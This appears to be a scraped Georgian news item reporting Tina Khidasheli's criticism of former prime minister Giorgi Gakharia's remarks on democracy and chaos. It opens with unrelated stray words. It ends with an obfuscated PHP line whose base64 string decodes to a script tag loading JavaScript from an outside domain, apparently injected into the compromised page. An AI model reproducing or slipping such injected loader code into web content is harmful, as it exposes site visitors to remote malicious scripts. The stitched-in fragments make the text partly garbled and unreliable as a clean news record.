celsiusi
ავერსი საქკაბელი
ხუმრობა იქით იყოს და სინამდვილეში, ძალიან სახიფათო გამოსვლა ქონდა ყოფილ-პრემიერს! დემოკრატიული განვითარების წესრიგად და ქაოსად გაყოფა ამ ქვეყანაში ჯერ არავის გაუბედავს! - მის შესახებ თავდაცვის ყოფილმს მინისტრმს, ორგანიზაცია „სამოქალაქო იდეის“ ხელმძღვანელმს თინა ხიდაშელმა განაცხადა. 
 
"ეს ძალიან საშიში და რუსული ნარატივი მთლიანად ტყუილი და მანიპულაციაა, და სინამდვილეში სწორედ დემოკრატიული მმართველობის წინააღმდეგ გაბრძოლების უსუსური მცდელობა ყოფილი, თუ სულით და გულით პოლიციელად დარჩენილი კაცისგან 
— დემოკრატიას არსად მოუტანია ან მოაქვს ქაოსი!
— დემოკრატია ძლიერ, ნდობითაღჭურვილ და მაღალი ლეგიტიმაციის ინსტიტუტებს ეფუძნება!  
— ქაოსი სუსტი და ნდობადაკარგულიინსტიტუტების შედეგია! 
— შესაბამისად, ავტოკრატიების და დიქტატურების!
კიდევ ერთხელ, ვუსმენდი და უფრო ცნობილი ლიბერალური და არალიბერალური დემოკრატიის საუბრები გამახსენდა. 2-3 კაცი ხართ მანდ საიმედო და რთულია ვიცი, მაგრამ მაინც აუხსენით!", - წერს საკუთარ სოციალურ გვერდზე თინა ხიდაშელი.
 
შეგახსენებთ, რომ ყოფილმა პრეიერ-მინისტრმა გიორგი გახარიამ პოლიტიკური პარტიის პრეზენტაცია დღეს გამართა. 
1237
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");